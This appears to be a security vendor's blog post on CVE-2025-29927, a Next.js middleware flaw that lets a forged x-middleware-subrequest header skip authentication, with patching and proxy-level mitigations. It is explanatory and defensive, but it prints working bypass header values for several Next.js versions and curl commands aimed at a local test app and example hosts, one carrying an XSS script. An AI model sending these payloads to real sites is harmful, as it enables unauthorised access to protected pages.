Strobesstrobes
Platform
Solutions
Resources
Customers
Company
Pricing
Book a Demo
Strobesstrobes

Strobes connects every exposure signal to autonomous action, so security teams fix what matters, prove what works, and stop chasing noise.

Book a DemoTalk to an expert
ISO 27001SOC 2CREST
  • Platform
  • Platform Overview
  • Agentic Exposure Management
  • AI Agents
  • Integrations
  • API & Developers
  • Workflows & Automation
  • Analytics & Reporting
  • Solutions
  • Exposure Assessment (EAP)
  • Attack Surface Management
  • Application Security Posture
  • Risk-Based Vulnerability Management
  • Adversarial Exposure Validation (AEV)
  • AI Pentesting
  • Pentesting as a Service
  • CTEM Framework
  • By Industry
  • Financial Institutions
  • Technology
  • Retail
  • Healthcare
  • Manufacturing
  • By Roles
  • CISOs
  • Security Directors
  • Cloud Security Leaders
  • App Sec Leaders
  • Resources
  • Quick Agentic Pentest
  • Blog
  • Customer Stories
  • eBooks
  • Datasheets
  • Videos & Demos
  • Exposure Management Academy
  • Pentesting ROI Calculator
  • Pentest Health Check
  • Security Tool ROI Calculator
  • Company
  • About Strobes
  • Meet the Team
  • Trust & Security
  • Contact Us
  • Careers
  • Become a Partner
  • Technology Partner
  • Partner Deal Registration
  • Press Release

Weekly insight for security leaders

CTEM research, agentic AI trends, and what's actually moving the needle.

© 2026 Strobes Security Inc. All rights reserved.

Privacy PolicyTerms of ServiceCookie PolicyAccessibilitySitemap
Back to Blog
CVE-2025-29927 - Understanding the Next.js Middleware Vulnerability
CVE

CVE-2025-29927 - Understanding the Next.js Middleware Vulnerability

strobesMarch 24, 20256 min read

Table of Contents

  • What Makes This Vulnerability So Dangerous?
  • Understanding Next.js Middleware
  • How The Bug Actually Works
  • Testing For Next JS Vulnerability (CVE-2025-29927)
  • Different Project Structures Need Different Exploits
  • Real-World Security Impacts
  • Protecting Your Next.js Applications
  • Trusted by leading enterprises like, GHX, Zoho, Darwinbox, Tricenties, and SHL
  • Key Security Lessons From Next JS Vulnerability (CVE-2025-29927)
  • Frequently Asked Questions About CVE-2025-29927
  • Checking Your Own Applications
  • Why Web Security Is Always Evolving

Authors

s
strobes

Share

Table of Contents

  • What Makes This Vulnerability So Dangerous?
  • Understanding Next.js Middleware
  • How The Bug Actually Works
  • Testing For Next JS Vulnerability (CVE-2025-29927)
  • Different Project Structures Need Different Exploits
  • Real-World Security Impacts
  • Protecting Your Next.js Applications
  • Trusted by leading enterprises like, GHX, Zoho, Darwinbox, Tricenties, and SHL
  • Key Security Lessons From Next JS Vulnerability (CVE-2025-29927)
  • Frequently Asked Questions About CVE-2025-29927
  • Checking Your Own Applications
  • Why Web Security Is Always Evolving

Authors

s
strobes

Share

When security vulnerabilities appear in popular frameworks, they can affect thousands of websites overnight. That’s exactly what happened with CVE-2025-29927, a critical Next.js middleware bypass that remains a top risk for unpatched applications. Next.js is one of the most widely used React frameworks today, and this flaw lets attackers bypass authentication, content security policies, and geo-restrictions with a single HTTP header.

Let’s break down this surprisingly simple but dangerous security flaw.

What Makes This Vulnerability So Dangerous?

Imagine building a house with a sophisticated security system, but accidentally installing a secret button that disables all the alarms at once. That’s essentially what happened with Next.js.

The vulnerability (officially called CVE-2025-29927) affects Next.js versions 11.1.4 through 15.2.2 – which means years worth of websites are potentially vulnerable.

Here’s the shocking part: all it takes to bypass security is adding a single HTTP header to your request:

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

Add this to any request, and suddenly all of Next.js’s security checks disappear. No login needed. No security barriers. Nothing.

Understanding Next.js Middleware

To understand why this works, we need to know a bit about middleware.

Next.js middleware acts like a security guard that checks visitors before they reach your actual website content. It runs before any page loads and can:

  • Check if users are logged in
  • Block visitors from certain countries
  • Add security headers to prevent attacks
  • Redirect users to different pages

About 15% of React applications use Next.js, and many rely on middleware for their core security.

How The Bug Actually Works

The problem stems from a mechanism designed to prevent infinite loops. Next.js needed a way to stop middleware from calling itself endlessly, so developers added a counter.

Here’s what happens:

  1. Every time middleware runs, Next.js checks a special header called
    x-middleware-subrequest
  2. This header contains a count of how many times middleware has run
  3. If it has run too many times (5 by default), Next.js skips the middleware entirely
  4. The critical flaw: anyone can set this header themselves

Looking at the actual code makes it clearer:

// From Next.js's source code (simplified)
const subrequests = request.headers.get('x-middleware-subrequest')?.split(':') || [];  
const depth = subrequests.filter(s => s === middlewareName).length;  

if (depth >= MAX_RECURSION_DEPTH) {  
  return NextResponse.next(); // Skip all middleware!
}

ThemiddlewareNameis usually something likemiddlewareorsrc/middlewaredepending on your project setup. By repeating this name in the header several times, an attacker tricks Next.js into thinking middleware has already run too many times. Catching header-trust flaws like this before they ship is precisely where agentic AI pentesting excels, because autonomous agents can systematically manipulate request headers across every route to expose authentication-bypass paths.

Testing For Next JS Vulnerability (CVE-2025-29927)

Anyone can verify if their Next.js application is vulnerable using a special test application created for this purpose: https://github.com/strobes-security/nextjs-vulnerable-app

The testing process works like this:

  1. Clone the repository:git clone https://github.com/strobes-security/nextjs-vulnerable-app
  2. Install dependencies and start the app:npm install && npm run dev
  3. Try accessing the/dashboardpage – you’ll be redirected to login
  4. Now try with the special header:
curl -v -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
http://localhost:3000/dashboard

Suddenly, the dashboard appears without any login. The security is completely bypassed.

Next.js Vulnerability
Next.js middleware Vulnerability

Different Project Structures Need Different Exploits

The exact header value changes depending on how your Next.js project is set up:

  • Pages Router (versions 11.1.4-12.1.x):x-middleware-subrequest: pages/_middleware
  • App Router (versions 12.2.x-13.x):x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
  • App Router with /src folder (versions 14.x-15.2.2):x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Real-World Security Impacts

This vulnerability opens several serious attack paths:

  1. Complete Authentication Bypass Attackers can access admin panels, private dashboards, or user data without logging in.
  2. Content Security Policy Bypass Middleware often sets CSP headers that prevent cross-site scripting. With this bypass, those protections vanish: curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \ -H "Content-Type: text/html" --data "<script>alert('hacked')</script>" \ http://example-site.com
  3. Geographic Restrictions Bypass Many sites use middleware to restrict content by location. This header bypasses those checks: curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \ -H "CF-IPCountry: RU" http://example-site.com/eu-only-content

Protecting Your Next.js Applications

There are three main ways to fix this vulnerability:

  1. Update Next.js Immediately
    • Upgrade to version 15.2.3+ or 14.2.25+
    • These versions have patched the security hole
  2. Block The Dangerous Header If updating isn’t possible right away, block the header at the web server level: For NGINX: nginxCopylocation / { proxy_set_header x-middleware-subrequest ""; }For Apache: apacheCopyRequestHeader unset x-middleware-subrequest
  3. Implement Defense-in-Depth
    • Don’t rely solely on middleware for security
    • Add server-side authentication checks (like with NextAuth.js)
    • For critical paths, add redundant security layers

Trusted by leading enterprises like, GHX, Zoho, Darwinbox, Tricenties, and SHL

Strobes helped organizations continuously manage threats, reduce vulnerabilities, and stay compliant, powered by AI-driven security expertise.

Schedule a Free Strategy Call Explore Solutions

Key Security Lessons From Next JS Vulnerability (CVE-2025-29927)

Frequently Asked Questions About CVE-2025-29927

Q: Is CVE-2025-29927 still exploitable on patched versions?
No. Versions 15.2.3+ and 14.2.25+ fix the header-trust flaw. Always update to the latest patch.

Q: Can a WAF block this attack without patching?
Yes, but only temporarily. Block the x-middleware-subrequest header at your reverse proxy or WAF as a stopgap.

Q: Does this vulnerability affect all Next.js sites?
Only those using middleware for security controls (authentication, CSP, redirects). Sites without middleware are not affected.

Q: How can I continuously detect similar header-based bypasses?
Use agentic validation tools like Strobes AI that autonomously fuzz request headers across every route to uncover authentication-bypass paths before attackers do.

This bug teaches three fundamental security principles:

  1. Security Needs Multiple Layers Like an onion or a castle with multiple walls, security should have fallback layers. If middleware fails, other security checks should still protect your application.
  2. Never Trust User-Controlled Input Any data from users – including HTTP headers – can be manipulated. Always validate or sanitize input.
  3. Simple Bugs Can Cause Major Problems This vulnerability wasn’t complex. It was a simple oversight in how a counter worked. Yet it compromised thousands of applications.

Checking Your Own Applications

If you run Next.js applications, take these steps immediately:

  1. Test your applications with the exploit payloads listed above
  2. Review all middleware configurations for security dependencies
  3. Update to the latest version as soon as possible

For more technical details, refer to:

  • The official CVE report: CVE-2025-29927
  • Additional technical analysis: Zhero Web Security Research
  • The vulnerable test app: GitHub Repository

Why Web Security Is Always Evolving

Next JS Vulnerability reminds us that security is never “done.” It’s an ongoing process. Even popular, well-maintained frameworks can have critical flaws discovered years after release.

The good news? The Next.js team responded quickly with patches. But this incident serves as a powerful reminder that we need to stay vigilant, keep our dependencies updated, and always implement multiple layers of security.

Want to see how Strobes can help you stay ahead of vulnerabilities like CVE-2025-29927? Book a free demo today.

Related Reads:

  1. Strobes 2023 Pentesting Recap: Trends, Stats, and How PTaaS is Transforming Cybersecurity
  2. CVE-2024-38063: An In-Depth Look at the Critical Remote Code Execution Vulnerability
  3. OpenSSH regreSSHion (CVE-2024-6387): A Blast from the Past with Critical Repercussions
  4. Understanding GitLab’s Critical Security Release: CVE-2023-5009
  5. New Feature: Grouping Vulnerabilities To Streamline Patch Management
  6. Agentic Pentesting vs Traditional Pentesting: Why Autonomous Validation Wins
Tags
CVE-2025-29927Next.js Vulnerability

Stop chasing vulnerabilities Start reducing exposure

See how Strobes AI agents validate and fix your most critical exposures automatically.

Book a Demo
Continue Reading

Related Posts

Top CVE's of June 2026
CVEVulnerability Intelligence

Top CVEs of June 2026: 5 Critical Flaws to Patch Now

Five CVEs defined June 2026: Check Point VPN bypass, Splunk pre-auth RCE, Windows HTTP.sys kernel RCE, LiteLLM AI-gateway RCE, and Defender BlueHammer. How to fix each.

Jul 1, 202612 min
CVE-2026-41940 - cPanel WHM Critical Pre-Auth Bypass Vulnerability
CVEVulnerability Intelligence

Top CVEs of May 2026: 5 Critical Flaws to Patch Now

Five CVEs dominated May 2026: cPanel's two-month zero-day, Linux's stealth kernel priv-esc, Langflow exploited 20 hours after disclosure, n8n's perfect-10 RCE chain, and Microsoft's SSO bypass. Here's what happened and what to do.

Jun 3, 20269 min
Top CVEs of April 2026 - CVE Roundup
CVEVulnerability Intelligence

Top 7 Critical CVEs of April 2026 You Need to Act On Now

The top CVEs of April 2026 were exploited in hours. Marimo RCE, Windows IKE, Fortinet EMS, GitHub GHES, ActiveMQ, and more. Attack scenarios, risk context, and fixes.

May 1, 202622 min